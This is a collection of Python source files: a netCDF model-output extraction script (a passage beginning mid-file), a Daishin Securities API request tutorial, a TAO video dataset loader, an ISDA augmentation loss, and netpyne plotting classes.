help="the output CDF file (created if it doesn't exist)")
parser.add_argument("outprefix",
help="a prefix for the extracted variables in the output CDF")
parser.add_argument("-d", dest="domain_node_shapefiles", action="append",
help="Specify a domain node shapefile")
parser.add_argument("-m", dest="masked_nodes_file", type=FileType('r'),
help="Specify a different masked nodes text file")
parser.add_argument("--invar", dest="input_vars", type=colon_meta,
action="append",
help="Extract the values of a different output variable")
parser.add_argument("-v", "--verbose", action="store_true", dest="verbose",
help="Print progress messages during the extraction")
parser.add_argument("-c", "--chunk-size", type=int, dest="chunk_size",
help="Process this many CDF files at once")
parser.add_argument("--cache", dest="cache", action="store_true",
help="Use a read/write cache in a temporary directory")
# Cannot include default values of lists here, see
# https://bugs.python.org/issue16399
parser.set_defaults(chunk_size=4, verbose=False,
masked_nodes_file=os.path.join(script_home, masked_nodes_txt))
args = parser.parse_args()
# This is the workaround
if not args.input_vars:
args.input_vars = [("DOXG",InputAttr.BOTTOM)]
if not args.domain_node_shapefiles:
args.domain_node_shapefiles = [os.path.join(script_home, domain_nodes_shp)]
logging.basicConfig(level=logging.INFO if args.verbose else logging.WARNING)
#logger.setLevel(logging.DEBUG)
if args.cache:
with tempfile.TemporaryDirectory() as tmpdir:
exist_cdfs = []
logger.info("Caching input files...")
for infile in args.incdf:
newpath = os.path.join(tmpdir, os.path.basename(infile))
shutil.copy(infile, newpath)
exist_cdfs.append(newpath)
output_cdf = os.path.join(tmpdir, os.path.basename(args.outcdf))
if os.path.exists(args.outcdf):
logger.info("Caching output file...")
shutil.copy(args.outcdf, output_cdf)
do_extract(exist_cdfs, output_cdf, **vars(args))
# Copy the resulting output CDF back
logger.info("Saving output file...")
shutil.copy(output_cdf, args.outcdf)
logger.info("Finished.")
else:
do_extract(args.incdf, args.outcdf, **vars(args))
def do_extract(exist_cdfs, output_cdf, **kwargs):
args = Namespace(**kwargs)
logger.info("Determining scope of work...")
indata = MFDataset(exist_cdfs) if len(exist_cdfs) > 1 else Dataset(exist_cdfs[0])
node_ids = get_node_ids(args.domain_node_shapefiles, args.masked_nodes_file)
logger.info("Initializing output file...")
if not os.path.exists(output_cdf):
outdata = init_output(output_cdf, indata, node_ids, **vars(args))
outdata['time'][:] = indata['time'][:] / 3600 / 24
else:
outdata = append_output(output_cdf)
init_output_vars(outdata, **vars(args))
# Attempts to use the entire MFDataset don't seem to scale well.
# Instead, I'm resorting to a blocking approach where MFDatasets are
# created for only a few netCDF files at a time
indata.close()
i = 0
total = 0
logger.info("Beginning extraction...")
start_time = time.perf_counter()
times_ct = outdata.dimensions['time'].size
for cdfchunk in chunks(exist_cdfs, args.chunk_size):
c = MFDataset(cdfchunk) if len(cdfchunk) > 1 else Dataset(cdfchunk[0])
chunk_times = len(c.dimensions['time'])
data = copy_data(c, outdata, i, node_ids, **vars(args))
i += chunk_times
c.close()
elapsed = (time.perf_counter() - start_time)
to_go = elapsed * (times_ct / i - 1)
total += np.sum([d.size * d.itemsize for k,d in data.items()])
logger.info("{0}/{1} ({2}s elapsed, {3}s to go, {4}KBps)".format(i,
times_ct, int(elapsed), int(to_go), int(total/elapsed/1000)))
logger.info("Extraction finished.")
outdata.close()
def copy_data(cdfin, cdfout, timeidx, node_ids, **kwargs):
args = Namespace(**kwargs)
times_ct = len(cdfin.dimensions['time'])
alldata = {}
# Copy zeta if it's needed
if 'zeta' in cdfout.variables:
alldata['zeta'] = cdfin['zeta'][:, node_ids - 1]
cdfout['zeta'][timeidx:timeidx + times_ct, :] = alldata['zeta']
for var, attr in args.input_vars:
out_name = args.outprefix + var
if attr == InputAttr.ALL:
slc = slice(None)
elif attr == InputAttr.BOTTOM:
slc = -1
out_name += "_bottom"
# TODO add "photic" case which will look rather different
data = cdfin[var][:, slc, node_ids - 1]
logger.debug("data is shape " + str(data.shape))
if attr == InputAttr.ALL:
cdfout[out_name][timeidx:timeidx+times_ct,:,:] = data
else:
cdfout[out_name][timeidx:timeidx+times_ct,:] = data
alldata[out_name] = data
return alldata
if __name__ == "__main__": main()
# ======================================================================
# File: tutorial/43.py | mssung94/daishin-trading-system @ d6682495afb7a08e68db65537b1d1789f2996891
# Python | 3,548 bytes | MIT | 2 stars
# ======================================================================
# Daishin Securities API
# Example comparing the two ways to request data: BlockRequest vs. Request
# Broadly, the Plus API offers two ways to request data
#
# BlockRequest method - the simplest way to request and receive data
# Request method - call Request, then receive the result via the Received event
#
# The example code below is written so the two approaches can be compared
# For ordinary data requests, the BlockRequest method is the simplest
# However, BlockRequest also pumps messages internally, so if real-time quotes arrive
# before the call completes, or another event triggers a re-entrant call, the call may fail
# If you need to communicate while receiving heavy real-time quote traffic, use the Request method instead.
import pythoncom
from PyQt5.QtWidgets import *
import win32com.client
import win32event
g_objCodeMgr = win32com.client.Dispatch('CpUtil.CpCodeMgr')
StopEvent = win32event.CreateEvent(None, 0, 0, None)
class CpEvent:
def set_params(self, client, name, caller):
        self.client = client  # CP real-time communication object
        self.name = name  # name used to tell apart events from different services
        self.caller = caller  # kept for use in callbacks
def OnReceived(self):
        # real-time handling - current price / order execution
        if self.name == 'stockmst':
            print('received')
win32event.SetEvent(StopEvent)
return
class CpCurReply:
def __init__(self, objEvent):
self.name = "stockmst"
self.obj = objEvent
def Subscribe(self):
handler = win32com.client.WithEvents(self.obj, CpEvent)
handler.set_params(self.obj, self.name, None)
def MessagePump(timeout):
waitables = [StopEvent]
while 1:
rc = win32event.MsgWaitForMultipleObjects(
waitables,
0, # Wait for all = false, so it waits for anyone
timeout, # (or win32event.INFINITE)
win32event.QS_ALLEVENTS) # Accepts all input
if rc == win32event.WAIT_OBJECT_0:
# Our first event listed, the StopEvent, was triggered, so we must exit
print('stop event')
break
elif rc == win32event.WAIT_OBJECT_0 + len(waitables):
# A windows message is waiting - take care of it. (Don't ask me
# why a WAIT_OBJECT_MSG isn't defined < WAIT_OBJECT_0...!).
# This message-serving MUST be done for COM, DDE, and other
# Windowsy things to work properly!
print('pump')
if pythoncom.PumpWaitingMessages():
break # we received a wm_quit message
        elif rc == win32event.WAIT_TIMEOUT:
            print('timeout')
            return
else:
print('exception')
raise RuntimeError("unexpected win32wait return value")
code = 'A005930'
##############################################################
# 1. BlockRequest
print('#####################################')
objStockMst = win32com.client.Dispatch("DsCbo1.StockMst")
objStockMst.SetInputValue(0, code)
objStockMst.BlockRequest()
print('Data received via BlockRequest')
item = {}
item['종목명'] = g_objCodeMgr.CodeToName(code)  # stock name
item['현재가'] = objStockMst.GetHeaderValue(11)  # current price (closing price)
item['대비'] = objStockMst.GetHeaderValue(12)  # change vs. previous close
print(item)
print('')
##############################################################
# 2. Request ==> message pump ==> receive via the OnReceived event
print('#####################################')
objReply = CpCurReply(objStockMst)
objReply.Subscribe()
code = 'A005930'
objStockMst.SetInputValue(0, code)
objStockMst.Request()
MessagePump(10000)
item = {}
item['종목명'] = g_objCodeMgr.CodeToName(code)  # stock name
item['현재가'] = objStockMst.GetHeaderValue(11)  # current price (closing price)
item['대비'] = objStockMst.GetHeaderValue(12)  # change vs. previous close
print(item)
# ======================================================================
# File: datasets/tao/tao.py | Nik-V9/AirObject @ 5937e64531f08449e81d2c90e3c6643727efbaf0
# Python | 10,280 bytes | BSD-3-Clause | 9 stars
# ======================================================================
from __future__ import print_function
import sys
sys.path.append('.')
import os
from typing import Optional, Union
import cv2
import numpy as np
import PIL.Image as Image
import pickle
import torch
from torch.utils import data
__all__ = ["TAO"]
class TAO(data.Dataset):
r"""A torch Dataset for loading in `the TAO VOS dataset <https://www.vision.rwth-aachen.de/page/taovos/>`_. Will fetch sequences of
rgb images, instance segmentation labels, SuperPoint features (optional).
Example of sequence creation from frames with `seqlen=4`, `dilation=1`, `stride=3`, and `start=2`:
.. code-block::
sequence0
┎───────────────┲───────────────┲───────────────┒
| | | |
frame0 frame1 frame2 frame3 frame4 frame5 frame6 frame7 frame8 frame9 frame10 frame11 ...
| | | |
└───────────────┵───────────────┵────────────────┚
sequence1
Args:
basedir (str): Path to the base directory containing the directories from TAO.
        videos (str or tuple of str): Videos to use from sequences (used for creating train/val/test splits). Can
            be a path to a `.txt` file where each line is a video sequence name, or a tuple of sequence names.
seqlen (int): Number of frames to use for each sequence of frames. Default: 4
dilation (int or None): Number of (original video's) frames to skip between two consecutive
frames in the extracted sequence. See above example if unsure.
If None, will set `dilation = 0`. Default: None
stride (int or None): Number of frames between the first frames of two consecutive extracted sequences.
See above example if unsure. If None, will set `stride = seqlen * (dilation + 1)`
(non-overlapping sequences). Default: None
start (int or None): Index of the frame from which to start extracting sequences for every video.
If None, will start from the first frame. Default: None
end (int): Index of the frame at which to stop extracting sequences for every video.
If None, will continue extracting frames until the end of the video. Default: None
height (int): Spatial height to resize frames to. Default: 480
width (int): Spatial width to resize frames to. Default: 640
return_seg (bool): Determines whether to return instance segmentation labels. Default: True
return_points (bool): Determines whether to return SuperPoint Features. Default: False
return_videonames (bool): Determines whether to return videonames for the sequences. Default: False
"""
def __init__(
self,
basedir: str,
videos: Union[tuple, str, None],
seqlen: int = 4,
dilation: Optional[int] = None,
stride: Optional[int] = None,
start: Optional[int] = None,
end: Optional[int] = None,
height: int = 480,
width: int = 640,
*,
return_img: bool = True,
return_seg: bool = True,
return_points: bool = False,
return_videonames: bool = False,
):
super(TAO, self).__init__()
self.basedir = os.path.normpath(basedir)
if not os.path.isdir(self.basedir):
raise ValueError("Base Directory: {} doesn't exist".format(basedir))
self.height = height
self.width = width
self.return_img = return_img
self.return_seg = return_seg
self.return_points = return_points
self.return_videonames = return_videonames
if not isinstance(seqlen, int):
raise TypeError("seqlen must be int. Got {0}.".format(type(seqlen)))
if not (isinstance(stride, int) or stride is None):
raise TypeError("stride must be int or None. Got {0}.".format(type(stride)))
if not (isinstance(dilation, int) or dilation is None):
raise TypeError(
"dilation must be int or None. Got {0}.".format(type(dilation))
)
dilation = dilation if dilation is not None else 0
stride = stride if stride is not None else seqlen * (dilation + 1)
self.seqlen = seqlen
self.stride = stride
self.dilation = dilation
if seqlen < 0:
raise ValueError("seqlen must be positive. Got {0}.".format(seqlen))
if dilation < 0:
raise ValueError('"dilation" must be positive. Got {0}.'.format(dilation))
if stride < 0:
raise ValueError("stride must be positive. Got {0}.".format(stride))
if not (isinstance(start, int) or start is None):
raise TypeError("start must be int or None. Got {0}.".format(type(start)))
if not (isinstance(end, int) or end is None):
raise TypeError("end must be int or None. Got {0}.".format(type(end)))
start = start if start is not None else 0
self.start = start
self.end = end
if start < 0:
raise ValueError("start must be positive. Got {0}.".format(stride))
if not (end is None or end > start):
raise ValueError(
"end ({0}) must be None or greater than start ({1})".format(end, start)
)
# videos should be a tuple
if isinstance(videos, str):
if os.path.isfile(videos):
with open(videos, "r") as f:
videos = tuple(f.read().split("\n"))
else:
raise ValueError("incorrect filename: {} doesn't exist".format(videos))
elif not (isinstance(videos, tuple)):
msg = "videos should either be path to split.txt or tuple of videos, but was of type %r instead"
raise TypeError(msg % type(videos))
self.RGB_data = []
self.Seg_data = []
self.Points_data = []
self.Videonames_data = []
idx = np.arange(self.seqlen) * (self.dilation + 1)
rgbdir = os.path.join(self.basedir, 'JPEGImages/')
pointsdir = os.path.join(self.basedir, 'points/')
segdir = os.path.join(self.basedir, 'Annotations/')
for video in videos:
file_names = [f for f in sorted(os.listdir(os.path.join(rgbdir, video))) if f.endswith('.jpg')]
rgb_list = [os.path.join(os.path.join(rgbdir, video), x) for x in file_names]
if self.return_points:
points_list = [os.path.join(os.path.join(pointsdir, video), x.replace('.jpg','.pkl')) for x in file_names]
if self.return_seg:
seg_list = [os.path.join(os.path.join(segdir, video), x.replace('.jpg','.png')) for x in file_names]
video_len = len(rgb_list)
for start_index in range(self.start, video_len, self.stride):
if start_index + idx[-1] >= video_len:
break
inds = start_index + idx
self.RGB_data.append([rgb_list[ind] for ind in inds])
if self.return_seg:
self.Seg_data.append([seg_list[ind] for ind in inds])
if self.return_points:
self.Points_data.append([points_list[ind] for ind in inds])
if self.return_videonames:
self.Videonames_data.append(video)
self.num_sequences = len(self.RGB_data)
def __len__(self):
r"""Returns the length of the dataset. """
return self.num_sequences
def __getitem__(self, idx: int):
r"""Returns the data from the sequence at index idx.
Returns:
color_seq (torch.Tensor): Sequence of grayscale rgb images of each frame
seg_seq (torch.Tensor): Sequence of instance segmentation labels for objects present in the frames
points_seq (torch.Tensor): Sequence of SuperPoint Features
videoname (str): Videoname of Sequence
Shape:
- color_seq: :math:`(L, 3, H, W)` where `L` denotes sequence length
- seg_seq: : "math: List of per frame instance segmentations with length `L`
- points_seq: "math: List of SuperPoint Features with length `L`
"""
# Read in the color info.
if self.return_img:
color_seq_path = self.RGB_data[idx]
if self.return_seg:
seg_seq_path = self.Seg_data[idx]
if self.return_points:
points_seq_path = self.Points_data[idx]
color_seq, seg_seq, points_seq = [], [], []
for i in range(self.seqlen):
if self.return_img:
image = cv2.imread(color_seq_path[i])
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = torch.from_numpy(image).type(torch.float16)
image = image.permute(2,0,1)
image /= 255
color_seq.append(image)
if self.return_seg:
instance_img = np.array(Image.open(seg_seq_path[i]))
obj_ids = np.unique(instance_img)
obj_ids = obj_ids[~np.isin(obj_ids, [0])]
frame_ann = []
for obj_id in obj_ids:
ann = {}
ann['obj_id'] = obj_id
ann_mask = np.isin(instance_img, obj_id).astype(int)
ann['ann_mask'] = ann_mask
frame_ann.append(ann)
seg_seq.append(frame_ann)
if self.return_points:
with open(points_seq_path[i],'rb') as fp:
points = pickle.load(fp)
points_seq.append(points)
output = []
if self.return_img:
color_seq = torch.stack(color_seq, 0).float()
output.append(color_seq)
if self.return_seg:
output.append(seg_seq)
if self.return_points:
output.append(points_seq)
if self.return_videonames:
output.append(self.Videonames_data[idx])
return tuple(output)
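# Illustrative usage sketch (not part of the original file; the base directory
# and video name below are hypothetical):
#
#   dataset = TAO("/data/TAOVOS", videos=("video_0001",), seqlen=4,
#                 return_seg=True, return_videonames=True)
#   color_seq, seg_seq, videoname = dataset[0]
#   # color_seq: float tensor of shape (4, 3, H, W); seg_seq: list of 4
#   # per-frame annotation lists; videoname: "video_0001"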
# ======================================================================
# File: augmentation/ISDA.py | RichardScottOZ/sota-data-augmentation-and-optimizers @ 60128ca762ac2864a3b54c43c36d1d5aa2033e5a
# Python | 3,853 bytes | MIT | 31 stars
# ======================================================================
import torch
import torch.nn as nn
class EstimatorCV():
def __init__(self, feature_num, class_num):
super(EstimatorCV, self).__init__()
self.class_num = class_num
self.CoVariance = torch.zeros(class_num, feature_num, feature_num)#.cuda()
self.Ave = torch.zeros(class_num, feature_num)#.cuda()
self.Amount = torch.zeros(class_num)#.cuda()
def update_CV(self, features, labels):
N = features.size(0)
C = self.class_num
A = features.size(1)
NxCxFeatures = features.view(
N, 1, A
).expand(
N, C, A
)
onehot = torch.zeros(N, C)#.cuda()
onehot.scatter_(1, labels.view(-1, 1), 1)
NxCxA_onehot = onehot.view(N, C, 1).expand(N, C, A)
features_by_sort = NxCxFeatures.mul(NxCxA_onehot)
Amount_CxA = NxCxA_onehot.sum(0)
Amount_CxA[Amount_CxA == 0] = 1
ave_CxA = features_by_sort.sum(0) / Amount_CxA
var_temp = features_by_sort - \
ave_CxA.expand(N, C, A).mul(NxCxA_onehot)
var_temp = torch.bmm(
var_temp.permute(1, 2, 0),
var_temp.permute(1, 0, 2)
).div(Amount_CxA.view(C, A, 1).expand(C, A, A))
sum_weight_CV = onehot.sum(0).view(C, 1, 1).expand(C, A, A)
sum_weight_AV = onehot.sum(0).view(C, 1).expand(C, A)
weight_CV = sum_weight_CV.div(
sum_weight_CV + self.Amount.view(C, 1, 1).expand(C, A, A)
)
weight_CV[weight_CV != weight_CV] = 0
weight_AV = sum_weight_AV.div(
sum_weight_AV + self.Amount.view(C, 1).expand(C, A)
)
weight_AV[weight_AV != weight_AV] = 0
additional_CV = weight_CV.mul(1 - weight_CV).mul(
torch.bmm(
(self.Ave - ave_CxA).view(C, A, 1),
(self.Ave - ave_CxA).view(C, 1, A)
)
)
self.CoVariance = (self.CoVariance.mul(1 - weight_CV) + var_temp
.mul(weight_CV)).detach() + additional_CV.detach()
self.Ave = (self.Ave.mul(1 - weight_AV) + ave_CxA.mul(weight_AV)).detach()
self.Amount += onehot.sum(0)
class ISDALoss(nn.Module):
def __init__(self, feature_num, class_num):
super(ISDALoss, self).__init__()
self.estimator = EstimatorCV(feature_num, class_num)
self.class_num = class_num
self.cross_entropy = nn.CrossEntropyLoss()
def isda_aug(self, fc, features, y, labels, cv_matrix, ratio):
N = features.size(0)
C = self.class_num
A = features.size(1)
weight_m = list(fc.parameters())[0]
NxW_ij = weight_m.expand(N, C, A)
NxW_kj = torch.gather(NxW_ij,
1,
labels.view(N, 1, 1)
.expand(N, C, A))
CV_temp = cv_matrix[labels]
# sigma2 = ratio * \
# torch.bmm(torch.bmm(NxW_ij - NxW_kj,
# CV_temp).view(N * C, 1, A),
# (NxW_ij - NxW_kj).view(N * C, A, 1)).view(N, C)
sigma2 = ratio * \
torch.bmm(torch.bmm(NxW_ij - NxW_kj,
CV_temp),
(NxW_ij - NxW_kj).permute(0, 2, 1))
sigma2 = sigma2.mul(torch.eye(C)#.cuda()
.expand(N, C, C)).sum(2).view(N, C)
aug_result = y + 0.5 * sigma2
return aug_result
def forward(self, model, fc, x, target_x, ratio):
features = model(x)
y = fc(features)
self.estimator.update_CV(features.detach(), target_x)
isda_aug_y = self.isda_aug(fc, features, y, target_x, self.estimator.CoVariance.detach(), ratio)
loss = self.cross_entropy(isda_aug_y, target_x)
return loss, y
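# Illustrative training-step sketch (not part of the original file; the tiny
# linear "backbone" below is a stand-in for a real feature extractor).
def _demo_isda_loss():
    model = nn.Linear(8, 16)   # maps inputs to 16-dim features
    fc = nn.Linear(16, 4)      # classifier head over 4 classes
    criterion = ISDALoss(feature_num=16, class_num=4)
    x = torch.randn(32, 8)
    target = torch.randint(0, 4, (32,))
    # ratio is typically annealed from 0 to its final value over training
    loss, logits = criterion(model, fc, x, target, ratio=0.5)
    return loss, logits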
# ======================================================================
# File: netpyne/plotting/plotter.py | sanjayankur31/netpyne @ d8b7e94cabeb27e23e30853ff17ae86518b35ac2
# Python | 22,828 bytes | MIT
# ======================================================================
"""
Module for plotting analyses
"""
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from copy import deepcopy
import pickle, json
import os
from matplotlib.offsetbox import AnchoredOffsetbox
try:
basestring
except NameError:
basestring = str
colorList = [[0.42, 0.67, 0.84], [0.90, 0.76, 0.00], [0.42, 0.83, 0.59], [0.90, 0.32, 0.00], [0.34, 0.67, 0.67], [0.90, 0.59, 0.00], [0.42, 0.82, 0.83], [1.00, 0.85, 0.00], [0.33, 0.67, 0.47], [1.00, 0.38, 0.60], [0.57, 0.67, 0.33], [0.50, 0.20, 0.00], [0.71, 0.82, 0.41], [0.00, 0.20, 0.50], [0.70, 0.32, 0.10]] * 3
class MetaFigure:
"""A class which defines a figure object"""
def __init__(self, kind, sim=None, subplots=None, rcParams=None, autosize=0.35, **kwargs):
if not sim:
from .. import sim
self.sim = sim
self.kind = kind
# Make a copy of the current matplotlib rcParams and update them
self.orig_rcParams = deepcopy(mpl.rcParamsDefault)
if rcParams:
for rcParam in rcParams:
if rcParam in mpl.rcParams:
mpl.rcParams[rcParam] = rcParams[rcParam]
else:
print(rcParam, 'not found in matplotlib.rcParams')
self.rcParams = rcParams
else:
self.rcParams = self.orig_rcParams
# Set up any subplots
if not subplots:
nrows = 1
ncols = 1
elif type(subplots) == int:
nrows = subplots
ncols = 1
elif type(subplots) == list:
nrows = subplots[0]
ncols = subplots[1]
# Create figure
if 'figSize' in kwargs:
figSize = kwargs['figSize']
else:
figSize = self.rcParams['figure.figsize']
if 'dpi' in kwargs:
dpi = kwargs['dpi']
else:
dpi = self.rcParams['figure.dpi']
if autosize:
maxplots = np.max([nrows, ncols])
figSize0 = figSize[0] + (maxplots-1)*(figSize[0]*autosize)
figSize1 = figSize[1] + (maxplots-1)*(figSize[1]*autosize)
figSize = [figSize0, figSize1]
self.fig, self.ax = plt.subplots(nrows, ncols, figsize=figSize, dpi=dpi)
self.plotters = []
def saveFig(self, sim=None, fileName=None, fileDesc=None, fileType='png', fileDir=None, overwrite=True, **kwargs):
"""
'eps': 'Encapsulated Postscript',
'jpg': 'Joint Photographic Experts Group',
'jpeg': 'Joint Photographic Experts Group',
'pdf': 'Portable Document Format',
'pgf': 'PGF code for LaTeX',
'png': 'Portable Network Graphics',
'ps': 'Postscript',
'raw': 'Raw RGBA bitmap',
'rgba': 'Raw RGBA bitmap',
'svg': 'Scalable Vector Graphics',
'svgz': 'Scalable Vector Graphics',
'tif': 'Tagged Image File Format',
'tiff': 'Tagged Image File Format'
"""
if not sim:
from .. import sim
if fileDesc is not None:
fileDesc = '_' + str(fileDesc)
else:
fileDesc = '_' + self.kind
if fileType not in self.fig.canvas.get_supported_filetypes():
raise Exception('fileType not recognized in saveFig')
else:
fileExt = '.' + fileType
if not fileName or not isinstance(fileName, basestring):
fileName = self.sim.cfg.filename + fileDesc + fileExt
else:
if fileName.endswith(fileExt):
fileName = fileName.split(fileExt)[0] + fileDesc + fileExt
else:
fileName = fileName + fileDesc + fileExt
if fileDir is not None:
fileName = os.path.join(fileDir, fileName)
if not overwrite:
while os.path.isfile(fileName):
try:
fileNumStr = fileName.split(fileExt)[0].split('_')[-1]
fileNumStrNew = str(int(fileNumStr) + 1).zfill(2)
fileName = fileName.split('_' + fileNumStr)[0]
except:
fileNumStr = fileNumStrNew = '01'
fileName = fileName.split(fileExt)[0]
fileName = fileName.split(fileNumStr)[0] + '_' + fileNumStrNew + fileExt
self.fig.savefig(fileName)
self.fileName = fileName
return fileName
def showFig(self, **kwargs):
try:
self.fig.show(block=False)
except:
self.fig.show()
def addSuptitle(self, **kwargs):
self.fig.suptitle(**kwargs)
def finishFig(self, **kwargs):
if 'suptitle' in kwargs:
if kwargs['suptitle']:
self.addSuptitle(**kwargs['suptitle'])
if 'tightLayout' not in kwargs:
plt.tight_layout()
elif kwargs['tightLayout']:
plt.tight_layout()
if 'saveFig' in kwargs:
if kwargs['saveFig']:
self.saveFig(**kwargs)
if 'showFig' in kwargs:
if kwargs['showFig']:
self.showFig(**kwargs)
else:
plt.close(self.fig)
# Reset the matplotlib rcParams to their original settings
mpl.style.use(self.orig_rcParams)
class GeneralPlotter:
"""A class used for plotting"""
def __init__(self, data, kind, axis=None, sim=None, rcParams=None, metafig=None, **kwargs):
"""
Parameters
----------
data : dict, str
axis : matplotlib axis
The axis to plot into. If axis is set to None, a new figure and axis are created and plotted into. If plotting into an existing axis, more options are available: xtwin, ytwin,
"""
self.kind = kind
# Load data
if type(data) == str:
if os.path.isfile(data):
self.data = self.loadData(data)
else:
raise Exception('In Plotter, if data is a string, it must be the path to a data file.')
else:
self.data = data
if not sim:
from .. import sim
self.sim = sim
self.axis = axis
if metafig:
self.metafig = metafig
# If an axis is input, plot there; otherwise make a new figure and axis
if self.axis is None:
final = True
self.metafig = MetaFigure(kind=self.kind, **kwargs)
self.fig = self.metafig.fig
self.axis = self.metafig.ax
else:
self.fig = self.axis.figure
# Attach plotter to its MetaFigure
self.metafig.plotters.append(self)
def loadData(self, fileName, fileDir=None, sim=None):
from ..analysis import loadData
self.data = loadData(fileName=fileName, fileDir=fileDir, sim=None)
def saveData(self, fileName=None, fileDesc=None, fileType=None, fileDir=None, sim=None, **kwargs):
from ..analysis import saveData as saveFigData
saveFigData(self.data, fileName=fileName, fileDesc=fileDesc, fileType=fileType, fileDir=fileDir, sim=sim, **kwargs)
def formatAxis(self, **kwargs):
if 'title' in kwargs:
self.axis.set_title(kwargs['title'])
if 'xlabel' in kwargs:
self.axis.set_xlabel(kwargs['xlabel'])
if 'ylabel' in kwargs:
self.axis.set_ylabel(kwargs['ylabel'])
if 'xlim' in kwargs:
if kwargs['xlim'] is not None:
self.axis.set_xlim(kwargs['xlim'])
if 'ylim' in kwargs:
if kwargs['ylim'] is not None:
self.axis.set_ylim(kwargs['ylim'])
if 'invert_yaxis' in kwargs:
if kwargs['invert_yaxis'] is True:
self.axis.invert_yaxis()
def addLegend(self, handles=None, labels=None, **kwargs):
legendParams = ['loc', 'bbox_to_anchor', 'fontsize', 'numpoints', 'scatterpoints', 'scatteryoffsets', 'markerscale', 'markerfirst', 'frameon', 'fancybox', 'shadow', 'framealpha', 'facecolor', 'edgecolor', 'mode', 'bbox_transform', 'title', 'title_fontsize', 'borderpad', 'labelspacing', 'handlelength', 'handletextpad', 'borderaxespad', 'columnspacing', 'handler_map']
# Check for and apply any legend parameters in the kwargs
legendKwargs = {}
for kwarg in kwargs:
if kwarg in legendParams:
legendKwargs[kwarg] = kwargs[kwarg]
# If 'legendKwargs' is found in kwargs, use those values instead of the defaults
if 'legendKwargs' in kwargs:
legendKwargs_new = kwargs['legendKwargs']
for key in legendKwargs_new:
if key in legendParams:
legendKwargs[key] = legendKwargs_new[key]
cur_handles, cur_labels = self.axis.get_legend_handles_labels()
if not handles:
handles = cur_handles
if not labels:
labels = cur_labels
self.axis.legend(handles, labels, **legendKwargs)
def addScalebar(self, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs):
add_scalebar(self.axis, matchx=matchx, matchy=matchy, hidex=hidex, hidey=hidey, unitsx=unitsx, unitsy=unitsy, scalex=scalex, scaley=scaley, xmax=xmax, ymax=ymax, space=space, **kwargs)
def addColorbar(self, **kwargs):
plt.colorbar(mappable=self.axis.get_images()[0], ax=self.axis, **kwargs)
def finishAxis(self, **kwargs):
self.formatAxis(**kwargs)
if 'saveData' in kwargs:
if kwargs['saveData']:
self.saveData(**kwargs)
if 'dpi' in kwargs:
if kwargs['dpi']:
self.fig.set_dpi(kwargs['dpi'])
if 'figSize' in kwargs:
if kwargs['figSize']:
self.fig.set_size_inches(kwargs['figSize'])
if 'legend' in kwargs:
if kwargs['legend'] is True:
self.addLegend(**kwargs)
elif type(kwargs['legend']) == dict:
self.addLegend(**kwargs['legend'])
if 'scalebar' in kwargs:
if kwargs['scalebar'] is True:
self.addScalebar()
elif type(kwargs['scalebar']) == dict:
self.addScalebar(**kwargs['scalebar'])
if 'colorbar' in kwargs:
if kwargs['colorbar'] is True:
self.addColorbar()
elif type(kwargs['colorbar']) == dict:
self.addColorbar(**kwargs['colorbar'])
if 'grid' in kwargs:
self.axis.minorticks_on()
if kwargs['grid'] is True:
self.axis.grid()
elif type(kwargs['grid']) == dict:
self.axis.grid(**kwargs['grid'])
# If this is the only axis on the figure, finish the figure
if type(self.metafig.ax) != list:
self.metafig.finishFig(**kwargs)
# Reset the matplotlib rcParams to their original settings
mpl.style.use(self.metafig.orig_rcParams)
class ScatterPlotter(GeneralPlotter):
"""A class used for scatter plotting"""
def __init__(self, data, axis=None, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'scatter'
self.x = data.get('x')
self.y = data.get('y')
self.s = data.get('s')
self.c = data.get('c')
self.marker = data.get('marker')
self.linewidth = data.get('linewidth')
self.cmap = data.get('cmap')
self.norm = data.get('norm')
self.alpha = data.get('alpha')
self.linewidths = data.get('linewidths')
def plot(self, **kwargs):
scatterPlot = self.axis.scatter(x=self.x, y=self.y, s=self.s, c=self.c, marker=self.marker, linewidth=self.linewidth, cmap=self.cmap, norm=self.norm, alpha=self.alpha, linewidths=self.linewidths)
self.finishAxis(**kwargs)
return self.fig
class LinePlotter(GeneralPlotter):
"""A class used for plotting one line per subplot"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'line'
self.x = np.array(data.get('x'))
self.y = np.array(data.get('y'))
self.color = data.get('color')
self.marker = data.get('marker')
self.markersize = data.get('markersize')
self.linewidth = data.get('linewidth')
self.alpha = data.get('alpha')
def plot(self, **kwargs):
linePlot = self.axis.plot(self.x, self.y, color=self.color, marker=self.marker, markersize=self.markersize, linewidth=self.linewidth, alpha=self.alpha)
self.finishAxis(**kwargs)
return self.fig
class LinesPlotter(GeneralPlotter):
"""A class used for plotting multiple lines on the same axis"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'lines'
self.x = np.array(data.get('x'))
self.y = np.array(data.get('y'))
self.color = data.get('color')
self.marker = data.get('marker')
self.markersize = data.get('markersize')
self.linewidth = data.get('linewidth')
self.alpha = data.get('alpha')
self.label = data.get('label')
def plot(self, **kwargs):
numLines = len(self.y)
if type(self.color) != list:
colors = [self.color for line in range(numLines)]
else:
colors = self.color
if type(self.marker) != list:
markers = [self.marker for line in range(numLines)]
else:
markers = self.marker
if type(self.markersize) != list:
markersizes = [self.markersize for line in range(numLines)]
else:
markersizes = self.markersize
if type(self.linewidth) != list:
linewidths = [self.linewidth for line in range(numLines)]
else:
linewidths = self.linewidth
if type(self.alpha) != list:
alphas = [self.alpha for line in range(numLines)]
else:
alphas = self.alpha
if self.label is None:
labels = [None for line in range(numLines)]
else:
labels = self.label
for index, line in enumerate(self.y):
self.axis.plot(
self.x,
self.y[index],
color=colors[index],
marker=markers[index],
markersize=markersizes[index],
linewidth=linewidths[index],
alpha=alphas[index],
label=labels[index],
)
self.finishAxis(**kwargs)
return self.fig
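# Illustrative sketch of the input dict LinesPlotter expects (not part of the
# original file; values are hypothetical, and GeneralPlotter imports `sim` from
# netpyne, so this is meant to run inside a netpyne session):
#
#   data = {'x': [0, 1, 2], 'y': [[0.0, 0.5, 1.0], [1.0, 0.5, 0.0]],
#           'color': ['C0', 'C1'], 'marker': 'o', 'markersize': 4,
#           'linewidth': 1.5, 'alpha': 0.8, 'label': ['rise', 'fall']}
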